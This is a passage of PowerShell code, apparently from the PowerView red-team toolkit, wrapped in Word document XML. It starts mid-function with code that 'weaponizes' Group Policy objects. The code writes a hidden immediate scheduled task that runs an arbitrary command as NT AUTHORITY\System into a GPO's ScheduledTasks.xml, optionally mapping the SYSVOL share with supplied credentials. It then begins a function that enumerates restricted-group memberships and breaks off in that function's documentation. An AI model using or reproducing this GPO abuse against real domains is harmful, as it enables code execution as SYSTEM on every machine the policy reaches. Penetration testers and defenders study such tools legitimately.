    <w:p w14:paraId="0CA360F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72CA8617" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Create')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E871551" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ParameterSetName = 'Remove')]        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F49B317" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4968846C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AD01DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2D8B4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2745C0CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # build the XML spec for our 'immediate' scheduled task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0211F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $TaskXML = '&lt;?xml version="1.0" encoding="utf-8"?&gt;&lt;ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}"&gt;&lt;ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="'+$TaskName+'" image="0" changed="'+$TaskModifiedDate+'" uid="{'+$([guid]::NewGuid())+'}" userContext="0" removePolicy="0"&gt;&lt;Properties action="C" name="'+$TaskName+'" runAs="NT AUTHORITY\System" logonType="S4U"&gt;&lt;Task version="1.3"&gt;&lt;RegistrationInfo&gt;&lt;Author&gt;'+$TaskAuthor+'&lt;/Author&gt;&lt;Description&gt;'+$TaskDescription+'&lt;/Description&gt;&lt;/RegistrationInfo&gt;&lt;Principals&gt;&lt;Principal id="Author"&gt;&lt;UserId&gt;NT AUTHORITY\System&lt;/UserId&gt;&lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt;&lt;LogonType&gt;S4U&lt;/LogonType&gt;&lt;/Principal&gt;&lt;/Principals&gt;&lt;Settings&gt;&lt;IdleSettings&gt;&lt;Duration&gt;PT10M&lt;/Duration&gt;&lt;WaitTimeout&gt;PT1H&lt;/WaitTimeout&gt;&lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt;&lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt;&lt;/IdleSettings&gt;&lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt;&lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt;&lt;StopIfGoingOnBatteries&gt;true&lt;/StopIfGoingOnBatteries&gt;&lt;AllowHardTerminate&gt;false&lt;/AllowHardTerminate&gt;&lt;StartWhenAvailable&gt;true&lt;/StartWhenAvailable&gt;&lt;AllowStartOnDemand&gt;false&lt;/AllowStartOnDemand&gt;&lt;Enabled&gt;true&lt;/Enabled&gt;&lt;Hidden&gt;true&lt;/Hidden&gt;&lt;ExecutionTimeLimit&gt;PT0S&lt;/ExecutionTimeLimit&gt;&lt;Priority&gt;7&lt;/Priority&gt;&lt;DeleteExpiredTaskAfter&gt;PT0S&lt;/DeleteExpiredTaskAfter&gt;&lt;RestartOnFailure&gt;&lt;Interval&gt;PT15M&lt;/Interval&gt;&lt;Count&gt;3&lt;/Count&gt;&lt;/RestartOnFailure&gt;&lt;/Settings&gt;&lt;Actions Context="Author"&gt;&lt;Exec&gt;&lt;Command&gt;'+$Command+'&lt;/Command&gt;&lt;Arguments&gt;'+$CommandArguments+'&lt;/Arguments&gt;&lt;/Exec&gt;&lt;/Actions&gt;&lt;Triggers&gt;&lt;TimeTrigger&gt;&lt;StartBoundary&gt;%LocalTimeXmlEx%&lt;/StartBoundary&gt;&lt;EndBoundary&gt;%LocalTimeXmlEx%&lt;/EndBoundary&gt;&lt;Enabled&gt;true&lt;/Enabled&gt;&lt;/TimeTrigger&gt;&lt;/Triggers&gt;&lt;/Task&gt;&lt;/Properties&gt;&lt;/ImmediateTaskV2&gt;&lt;/ScheduledTasks&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7767D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0BD6ED9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if (!$PSBoundParameters['GPOname'] -and !$PSBoundParameters['GPODisplayName']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F663923" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Warning 'Either -GPOName or -GPODisplayName must be specified'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAAC7C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BF3C37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4475EDC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B300FC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # eunmerate the specified GPO(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD97A36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    $GPOs = Get-NetGPO -GPOname $GPOname -DisplayName $GPODisplayName -Domain $Domain -DomainController $DomainController -ADSpath $ADSpath -Credential $Credential </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3269D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78126F08" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if(!$GPOs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763A8CA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Warning 'No GPO found.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F31C6BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A24129" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AAAF71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59194B1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $GPOs | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A632878" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ProcessedGPOName = $_.Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09145F62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9BF9A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Trying to weaponize GPO: $ProcessedGPOName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C49D30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78CEEC1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # map a network drive as New-PSDrive/New-Item/etc. don't accept -Credential properly :(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3544FEC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EF2E60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Mapping '$($_.gpcfilesyspath)' to network drive N:\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD2EC0C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Path = $_.gpcfilesyspath.TrimEnd('\')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B653A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Net = New-Object -ComObject WScript.Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B4694B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Net.MapNetworkDrive("N:", $Path, $False, $Credential.UserName, $Credential.GetNetworkCredential().Password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F380F21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TaskPath = "N:\Machine\Preferences\ScheduledTasks\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A93743" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB9C9C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047D9E60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TaskPath = $_.gpcfilesyspath + "\Machine\Preferences\ScheduledTasks\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62317142" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD2ED83" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3FEE69B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Remove) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385A9B59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if(!(Test-Path "$TaskPath\ScheduledTasks.xml")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07068791" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Throw "Scheduled task doesn't exist at $TaskPath\ScheduledTasks.xml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208B7E2D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2274362D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F4F2E2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if (!$Force -and !$psCmdlet.ShouldContinue('Do you want to continue?',"Removing schtask at $TaskPath\ScheduledTasks.xml")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAB0EF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C694642" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB944FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67989738" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Remove-Item -Path "$TaskPath\ScheduledTasks.xml" -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EE1C1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B90CB4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16292784" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if (!$Force -and !$psCmdlet.ShouldContinue('Do you want to continue?',"Creating schtask at $TaskPath\ScheduledTasks.xml")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DDA96D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B99676" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCDFADE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1DF3DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # create the folder if it doesn't exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14211744" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Null = New-Item -ItemType Directory -Force -Path $TaskPath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54864519" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E15AF2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if(Test-Path "$TaskPath\ScheduledTasks.xml") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EDCB5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    Throw "Scheduled task already exists at $TaskPath\ScheduledTasks.xml !"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9F2785" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBBDB66" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2ADCE033" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TaskXML | Set-Content -Encoding ASCII -Path "$TaskPath\ScheduledTasks.xml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7691E003" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554BCAF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57B6A446" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C8E7E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Removing mounted drive at N:\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A752D8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Net = New-Object -ComObject WScript.Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6199F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Net.RemoveNetworkDrive("N:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475CA2D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DF4980" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C138CF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7513B4EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Warning "Error for GPO $ProcessedGPOName : $_"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1010AFBB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Credential) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B326549" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "Removing mounted drive at N:\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07647EE2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Net = New-Object -ComObject WScript.Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3564642B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Net.RemoveNetworkDrive("N:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676384B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE711B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9F338F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C89B085" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1945A14E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1F49EFA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="727B83A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-NetGPOGroup {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0775868B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B727E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0781FB72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2097FEEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns all GPOs in a domain that set "Restricted Groups" or use groups.xml on on target machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021BEB59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0420649E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Author: @harmj0y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C0A61D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        License: BSD 3-Clause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB19785" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Required Dependencies: Get-NetGPO, Get-GptTmpl, Get-GroupsXML, Convert-NameToSid, Convert-SidToName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0E9093" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Optional Dependencies: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCD2747" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C689A65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .DESCRIPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F7F919" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5B1BF6D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        First enumerates all GPOs in the current/target domain using Get-NetGPO with passed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD9903D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F50D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        group membership is set through Group Policy Preferences groups.xml files. For any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4D62C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D282B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        section data is processed if present. Any found Groups.xml files are parsed with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EDA94F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-GroupsXML and those memberships are returned as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1384F4B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6EAD1972" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER GPOname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B62C1E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="44C73E8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The GPO name (GUID) to query for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB7CE9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="687E45A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DisplayName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F424792" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CC07F36" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The GPO display name to query for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD05EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D38F744" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D72BEF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2614428D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for GPOs, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
